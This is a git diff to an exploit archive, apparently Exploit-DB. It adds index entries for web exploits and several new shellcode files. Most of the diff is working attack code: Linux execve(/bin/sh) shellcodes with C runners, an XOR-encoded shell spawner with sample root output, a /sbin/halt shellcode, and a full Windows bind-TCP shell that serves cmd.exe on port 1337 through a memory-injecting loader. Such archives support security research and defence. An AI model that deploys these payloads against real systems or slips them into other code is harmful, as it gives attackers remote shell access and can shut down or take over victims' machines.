BYpass",1970-01-01,"Janik Wehrli",webapps,php, 50333,exploits/php/webapps/50333.txt,"WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Renos Nikolaou",webapps,php, 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php, +50338,exploits/hardware/webapps/50338.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,hardware, 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware, 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware, @@ -44330,6 +44379,7 @@ id,file,description,date,author,type,platform,port 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, +50349,exploits/php/webapps/50349.txt,"WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50350,exploits/php/webapps/50350.txt,"WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting",1970-01-01,0xB9,webapps,php, 50352,exploits/php/webapps/50352.txt,"OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)",1970-01-01,"Eric Salario",webapps,php, 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Mr.Gedik,webapps,php, @@ -44337,12 +44387,14 @@ id,file,description,date,author,type,platform,port 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, 50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, +50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, 50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple, 50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, 50371,exploits/multiple/webapps/50371.txt,"Payara Micro Community 5.2021.6 - Directory Traversal",1970-01-01,"Yasser Khan",webapps,multiple, +50372,exploits/php/webapps/50372.txt,"Lodging Reservation Management System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, 50373,exploits/multiple/webapps/50373.py,"Open Game Panel - Remote Code Execution (RCE) (Authenticated)",1970-01-01,prey,webapps,multiple, 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Jordan Glover",webapps,php, 50375,exploits/php/webapps/50375.txt,"Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)",1970-01-01,"Jordan Glover",webapps,php, @@ -44350,6 +44402,7 @@ id,file,description,date,author,type,platform,port 50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java, 50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php, 50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, +50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple, 50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple, 50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php, 50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 183fffa14..90793a5b6 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1025,4 +1025,9 @@ id,file,description,date,author,type,platform 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86 +49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux +49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86 +49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64 +49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 +50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 diff --git a/shellcodes/linux/49756.asm b/shellcodes/linux/49756.asm new file mode 100644 index 000000000..7d17307b5 --- /dev/null +++ b/shellcodes/linux/49756.asm @@ -0,0 +1,28 @@ +# Exploit Title: Linux/x64 - /sbin/halt -p Shellcode (51 bytes) +# Date: 07/04/2020 +# Exploit Author: Chenthur Velan +# Version: 0.0.1 +# Tested on: Linux Intelx86-64 + +global _start + +_start: + xor rax, rax + push rax + push word 0x702d + mov rcx, rsp + + push rax + mov r8, 0x746c61682f2f2f2f + mov r10, 0x6e6962732f2f2f2f + push r8 + push r10 + mov rdi, rsp + + push rax + push rcx + push rdi + mov rsi, rsp + + add rax, 59 + syscall \ No newline at end of file diff --git a/shellcodes/linux_x86-64/49770.c b/shellcodes/linux_x86-64/49770.c new file mode 100644 index 000000000..a8eed827d --- /dev/null +++ b/shellcodes/linux_x86-64/49770.c @@ -0,0 +1,46 @@ +# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) +# Author: s1ege +# Tested on: x86_64 GNU/Linux +# Shellcode Length: 21 + +/* + +################################################ +objdump disassembly +################################################ +401000: 50 push %rax +401001: 48 31 d2 xor %rdx,%rdx +401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx +40100b: 2f 73 68 +40100e: 53 push %rbx +40100f: 54 push %rsp +401010: 5f pop %rdi +401011: b0 3b mov $0x3b,%al +401013: 0f 05 syscall +################################################ + +################################################ +shellcode.asm +################################################ +; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode +section .text +global _start +_start: +push rax +xor rdx, rdx +mov rbx, 0x68732f2f6e69622f +push rbx +push rsp +pop rdi +mov al, 59 +syscall +################################################ +*/ +unsigned char shellcode[] = \ +"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; + +int main() { +int (*ret)() = (int(*)())shellcode; +ret(); +return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/49768.c b/shellcodes/linux_x86/49768.c new file mode 100644 index 000000000..f7fd5ce4b --- /dev/null +++ b/shellcodes/linux_x86/49768.c @@ -0,0 +1,30 @@ +# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes) +# Author: s1ege +# Tested on: i686 GNU/Linux +# Shellcode length: 17 + +/* +; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode +section .text +global _start +_start: +push 0x0b +pop eax +push 0x0068732f +push 0x6e69622f +mov ebx, esp +int 0x80 +*/ + +#include +#include + +unsigned char code[] = \ +"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; + +int main() { +printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte +int (*ret)() = (int(*)())code; +ret(); +return 0; +} \ No newline at end of file diff --git a/shellcodes/linux_x86/49976.c b/shellcodes/linux_x86/49976.c new file mode 100644 index 000000000..325b467f9 --- /dev/null +++ b/shellcodes/linux_x86/49976.c @@ -0,0 +1,74 @@ +# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded) +# Date: 09/06/2021 +# Exploit Author: d7x +# Tested on: Ubuntu x86 + +/*** + shellcode with XOR decoder stub and fstenv MMX FPU + spawning a /bin/sh shell + + uses the fstenv GetPC technique to get the memory address dynamically + (alternative to jmp-call-pop) + + Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c + ./mmx-xor-decoder_eip + Shellcode Length: 70 + # id + uid=0(root) gid=0(root) groups=0(root) + # ps -p $$ + PID TTY TIME CMD + 24045 pts/4 00:00:00 sh + + *** Created by d7x + https://d7x.promiselabs.net + https://www.promiselabs.net *** +***/ + +/*** +; shellcode assembly + +global _start + +section .text +_start: + fldz + fstenv [esp-0xc] + pop edi ; put eip into edi + add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz) + + lea esi, [edi + 8] + xor ecx, ecx + mov cl, 4 + +decode: + movq mm0, qword [edi] + movq mm1, qword [esi] + pxor mm0, mm1 + movq qword [esi], mm0 + add esi, 0x8 + loop decode + + jmp short EncodedShellcode + +shellcode: + + decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d + EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d + +***/ + +#include +#include + +unsigned char shellcode[] = \ +"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a"; + +void main(void) +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int(*ret)() = (int(*)())shellcode; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/windows_x86/50384.c b/shellcodes/windows_x86/50384.c new file mode 100644 index 000000000..c824c7340 --- /dev/null +++ b/shellcodes/windows_x86/50384.c @@ -0,0 +1,324 @@ +; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes) +; Author: h4pp1n3ss +; Date: Wed 10/06/2021 +; Tested on: Microsoft Windows [Version 10.0.19042.1237] + +; Description: +; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses +; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols. +; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length. + + start: ; + + mov ebp, esp ; + add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering + + find_kernel32: + + xor ecx, ecx ; ECX = Null + mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30]) + mov esi,[esi+0x0C] ; ESI = PEB->Ldr + mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder + + next_module: ; + + mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address + mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name + mov esi, [esi] ; ESI = InInitOrder[X].flink (next module) + cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll? + jne next_module ; No: try next module + + find_function_shorten: ; + + jmp find_function_shorten_bnc ; short jump + + find_function_ret: ; + + pop esi ; ESI = POP return addres + mov [ebp+0x04], esi ; Save find_function address for later usage + jmp resolve_symbols_kernel32 ; + + find_function_shorten_bnc: ; + call find_function_ret ; Call fund_function_ret PUSH ret address into the stack + + find_function: ; + + pushad ; Save all registers + mov eax, [ebx+0x3c] ; Offset of PE signature + mov edi, [ebx+eax+0x78] ; Export Table Directory RVA + add edi, ebx ; Export Table Directory VMA + mov ecx, [edi+0x18] ; NumberOfNames + mov eax, [edi+0x20] ; AddressOfNames RVA + add eax, ebx ; AddresOfNames VMA + mov [ebp-4], eax ; Save AddressOfName VMA for later usage + + find_function_loop: ; + jecxz find_function_finished ; Jump to the end if ECX is 0 + dec ecx ; Decrement our counter + mov eax, [ebp-4] ; Restore AddressOfNames VMA + mov esi, [eax+ecx*4] ; Get the RVA of the symbol name + add esi, ebx ; Set ESI to the VMA of the current symbol name + + compute_hash: ; + xor eax, eax ; EAX = Null + cdq ; Null EDX + cld ; Clear direction flag + + compute_hash_again: + lodsb ; Load the next bytes from ESI into al + test al, al ; Check for Null terminator + jz compute_hash_finished ; If the ZF is set, we've hit the NULL term + ror edx, 0x0d ; Rotate edx 13 bits to the right + add edx, eax ; Add the new byte to the accumulator + jmp compute_hash_again ; Next iteration + + compute_hash_finished: ; + + find_function_compare: + cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash + jnz find_function_loop ; If it doesn't match go back to find_function_loop + mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA + add edx, ebx ; AddressOfNameOrdinals VMA + mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal + mov edx, [edi+0x1c] ; AddressOfFunctions RVA + add edx, ebx ; AddressOfFunctions VMA + mov eax, [edx+4*ecx] ; Get the function RVA + add eax, ebx ; Get the function VMA + mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad + + find_function_finished: ; + popad ; Restore registers + ret ; + + resolve_symbols_kernel32: ; + push 0x78b5b983 ; TerminateProcess hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x10], eax ; Save TerminateProcess address for later usage + push 0xec0e4e8e ; LoadLibraryA hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage + push 0x16b3fe72 ; CreateProcessA hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x18], eax ; Save CreateProcessA address for later usage + + load_ws2_32: ; + xor eax, eax ; EAX = Null + mov ax, 0x6c6c ; EAX = 0x6c6c + push eax ; ESP = "ll" + push dword 0x642e3233 ; ESP = "32.dll" + push dword 0x5f327377 ; ESP = "ws2_32.dll" + push esp ; ESP = &("ws2_32.dll") + call dword [ebp+0x14] ; Call LoadLibraryA + +resolve_symbols_ws2_32: + mov ebx, eax ; Move the base address of ws2_32.dll to EBX + push 0x3bfcedcb ; WSAStartup hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x1C], eax ; Save WSAStartup address for later usage + push 0xadf509d9 ; WSASocketA hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x20], eax ; Save WSASocketA address for later usage + push 0xc7701aa4 ; Bind hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x24], eax ; Save Bind address for later usage + push 0xe92eada4 ; listen hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x28], eax ; Save listen address for later usage + push 0x9f5b7976 ; WSAGetLastError hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage + push 0x498649e5 ; accept hash + call dword [ebp+0x04] ; Call find_function + mov [ebp+0x36], eax ; Save acccept address for later usage + + call_wsastartup: ; + mov eax, esp ; Move ESP to EAX + mov cx, 0x590 ; Move 0x590 to CX + sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later + push eax ; Push lpWSAData + xor eax, eax ; EAX = Null + mov ax, 0x0202 ; Move version to AX + push eax ; Push wVersionRequired (0x00000202) + call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData) + + call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL ) + xor eax, eax ; EAX = Null + push eax ; Push dwFlags + push eax ; Push g + push eax ; Push lpProtocolInfo + mov al, 0x06 ; Move AL, IPPROTO_TCP + push eax ; Push protocol + sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01 + push eax ; Push type + inc eax ; Increase EAX, EAX = 0x02 + push eax ; Push af + call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0) + + create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0} + mov esi, eax ; Move the SOCKET descriptor to ESI + xor eax, eax ; EAX = Null + push eax ; Push sin_addr (any address 0.0.0.0) + mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905) + shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000) + add ax, 0x02 ; Add 0x02 (AF_INET) to AX + push eax ; Push sin_port & sin_family + push esp ; Push pointer to the sockaddr_in structure + pop edi ; EDI = &(sockaddr_in) + + call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16) + xor eax, eax ; EAX = Null + add al, 0x16 ; Set AL to 0x16 + push eax ; Push namelen + push edi ; Push *addr + push esi ; Push s + call dword [ebp+0x24] ; Call bind + + call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse) + call dword [ebp+0x32] ; Call WSAGetLastError + + call_listen: ; + xor eax, eax ; EAX = Null + push eax ; Push backlog + push esi ; Push s + call dword [ebp+0x28] ; Call WS2_32!listen + + call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen) + xor eax, eax ; EAX = Null + push eax ; Push *addrlen (optional) + push eax ; Push *addr (optional) + push esi ; Push socket HANDLE from WSASocketA() + call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null) + + create_startupinfoa: ; + mov esi, eax ; Save Handle returned from accept() into ESI + push esi ; Push hStdError + push esi ; Push hStdOutput + push esi ; Push hStdInput + xor eax, eax ; EAX = Null + push eax ; Push lpReserved2 + push eax ; Push cbReserved2 & wShowWindow + mov al, 0x80 ; Move 0x80 to AL + xor ecx, ecx ; EAX = Null + mov cl, 0x80 ; Move 0x80 to CL + add eax, ecx ; Set EAX to 0x100 + push eax ; Push dwFlags + xor eax, eax ; EAX = Null + push eax ; Push dwFillAttribute + push eax ; Push dwYCountChars + push eax ; Push dwXCountChars + push eax ; Push dwYSize + push eax ; Push dwXSize + push eax ; Push dwY + push eax ; Push dwX + push eax ; Push lpTitle + push eax ; Push lpDesktop + push eax ; Push lpReserved + mov al, 0x44 ; Move 0x44 to AL + push eax ; Push cb + push esp ; Push pointer to the STARTUPINFOA structure + pop edi ; Store pointer to STARTUPINFOA in EDI + + create_cmd_string: ; + mov eax, 0xff9a879b ; Move 0xff9a879b into EAX + neg eax ; Negate EAX, EAX = 00657865 + push eax ; Push part of the "cmd.exe" string + push 0x2e646d63 ; Push the remainder of the "cmd.exe" string + push esp ; Push pointer to the "cmd.exe" string + pop ebx ; Store pointer to the "cmd.exe" string in EBX + + call_createprocessa: ; + mov eax, esp ; Move ESP to EAX + xor ecx, ecx ; ECX = Null + mov cx, 0x390 ; Move 0x390 to CX + sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later + push eax ; Push lpProcessInformation + push edi ; Push lpStartupInfo + xor eax, eax ; EAX = Null + push eax ; Push lpCurrentDirectory + push eax ; Push lpEnvironment + push eax ; Push dwCreationFlags + inc eax ; Increase EAX, EAX = 0x01 (TRUE) + push eax ; Push bInheritHandles + dec eax ; EAX = Null + push eax ; Push lpThreadAttributes + push eax ; Push lpProcessAttributes + push ebx ; Push lpCommandLine + push eax ; Push lpApplicationName + call dword [ebp+0x18] ; Call CreateProcessA + + call_terminate_process: ; + xor eax, eax ; EAX = Null + push eax ; uExitCode + push 0xffffffff ; HANDLE hProcess + call dword [ebp+0x04] ; Call TerminateProcess + + +[*]================================= POC =============================== [*] + + + +/* + + Shellcode runner author: reenz0h (twitter: @sektor7net) + +*/ +#include +#include +#include +#include + +// nasm -f win32 shellcode.asm -o shellcode.o +// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' + + +unsigned char payload[] = + "\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b" + "\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06" + "\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03" + "\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b" + "\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca" + "\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b" + "\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3" + "\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55" + "\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66" + "\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14" + "\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad" + "\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68" + "\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04" + "\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9" + "\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50" + "\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50" + "\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16" + "\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0" + "\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31" + "\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50" + "\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e" + "\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50" + "\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55" + "\x04"; + +unsigned int payload_len = 415; + +int main(void) { + + void * exec_mem; + BOOL rv; + HANDLE th; + DWORD oldprotect = 0; + + exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + RtlMoveMemory(exec_mem, payload, payload_len); + + rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); + + printf("Shellcode Length: %d\n", strlen(payload)); + + if ( rv != 0 ) { + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0); + WaitForSingleObject(th, -1); + + } + + return 0; +} \ No newline at end of file